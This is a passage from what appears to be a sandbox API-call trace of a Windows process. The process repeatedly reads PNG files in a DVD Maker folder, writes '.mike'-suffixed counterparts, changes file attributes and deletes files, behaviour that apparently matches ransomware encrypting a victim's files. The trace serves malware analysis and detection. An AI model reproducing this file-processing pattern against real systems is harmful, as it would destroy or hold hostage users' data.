lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2272590*, lpNumberOfBytesRead=0x2af080*=0xb05, lpOverlapped=0x0) returned 1 [0066.108] CloseHandle (hObject=0x288) returned 1 [0066.108] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.109] WriteFile (in: hFile=0x288, lpBuffer=0x2279678*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2279678*, lpNumberOfBytesWritten=0x2af074*=0xb10, lpOverlapped=0x0) returned 1 [0066.109] CloseHandle (hObject=0x288) returned 1 [0066.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.110] WriteFile (in: hFile=0x288, lpBuffer=0x227c898*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x227c898*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.110] CloseHandle (hObject=0x288) returned 1 [0066.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpFilePart=0x0) returned 0x41 [0066.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.111] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0066.112] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpFilePart=0x0) returned 0x41 [0066.112] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.112] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.112] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png.mike")) returned 1 [0066.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpFilePart=0x0) returned 0x4b [0066.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpFilePart=0x0) returned 0x4b [0066.113] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpFilePart=0x0) returned 0x4b [0066.115] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.115] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.115] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpFilePart=0x0) returned 0x4b [0066.116] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.116] WriteFile (in: hFile=0x288, lpBuffer=0x2281940*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2281940*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.117] CloseHandle (hObject=0x288) returned 1 [0066.117] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.117] ReadFile (in: hFile=0x288, lpBuffer=0x2282a88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2282a88*, lpNumberOfBytesRead=0x2af080*=0x15f4, lpOverlapped=0x0) returned 1 [0066.118] CloseHandle (hObject=0x288) returned 1 [0066.119] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.120] WriteFile (in: hFile=0x288, lpBuffer=0x228ff70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x228ff70*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.120] CloseHandle (hObject=0x288) returned 1 [0066.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpFilePart=0x0) returned 0x4b [0066.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.121] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.121] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", dwFileAttributes=0x80) returned 0 [0066.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpFilePart=0x0) returned 0x4b [0066.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.122] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike", lpFilePart=0x0) returned 0x50 [0066.122] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png.mike")) returned 1 [0066.123] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpFilePart=0x0) returned 0x46 [0066.123] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpFilePart=0x0) returned 0x46 [0066.123] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpFilePart=0x0) returned 0x46 [0066.125] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpFilePart=0x0) returned 0x46 [0066.125] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.126] WriteFile (in: hFile=0x288, lpBuffer=0x229505c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x229505c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.127] CloseHandle (hObject=0x288) returned 1 [0066.127] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.127] ReadFile (in: hFile=0x288, lpBuffer=0x2296190, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2296190*, lpNumberOfBytesRead=0x2af080*=0x143e, lpOverlapped=0x0) returned 1 [0066.160] CloseHandle (hObject=0x288) returned 1 [0066.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.162] WriteFile (in: hFile=0x288, lpBuffer=0x22a2bd4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22a2bd4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.162] CloseHandle (hObject=0x288) returned 1 [0066.162] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpFilePart=0x0) returned 0x46 [0066.163] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.163] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.163] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", dwFileAttributes=0x80) returned 0 [0066.164] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpFilePart=0x0) returned 0x46 [0066.164] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.164] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike", lpFilePart=0x0) returned 0x4b [0066.164] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png.mike")) returned 1 [0066.165] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x55 [0066.165] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x55 [0066.165] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x55 [0066.167] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.167] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x55 [0066.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.168] WriteFile (in: hFile=0x288, lpBuffer=0x22a7f8c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22a7f8c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.169] CloseHandle (hObject=0x288) returned 1 [0066.169] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.169] ReadFile (in: hFile=0x288, lpBuffer=0x22a90fc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22a90fc*, lpNumberOfBytesRead=0x2af080*=0x13e0, lpOverlapped=0x0) returned 1 [0066.170] CloseHandle (hObject=0x288) returned 1 [0066.171] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.172] WriteFile (in: hFile=0x288, lpBuffer=0x22b31cc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22b31cc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.172] CloseHandle (hObject=0x288) returned 1 [0066.172] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x55 [0066.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.173] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0066.174] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpFilePart=0x0) returned 0x55 [0066.174] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.174] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x5a [0066.174] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\navigationleft_buttongraphic.png.mike")) returned 1 [0066.175] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5b [0066.175] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5b [0066.175] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5b [0066.177] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png", lpFilePart=0x0) returned 0x5b [0066.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.178] WriteFile (in: hFile=0x288, lpBuffer=0x22b8904*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22b8904*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.179] CloseHandle (hObject=0x288) returned 1 [0066.179] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.179] ReadFile (in: hFile=0x288, lpBuffer=0x22b9a8c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b9a8c*, lpNumberOfBytesRead=0x2af080*=0xc3a, lpOverlapped=0x0) returned 1 [0066.180] CloseHandle (hObject=0x288) returned 1 [0066.181] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_SelectionSubpicture.png.mike", lpFilePart=0x0) returned 0x60 [0066.181] WriteFile (in: hFile=0x288, lpBuffer=0x22c12fc*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22c12fc*, lpNumberOfBytesWritten=0x2af074*=0xc40, lpOverlapped=0x0) returned 1 [0066.181] CloseHandle (hObject=0x288) returned 1 [0066.181] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD 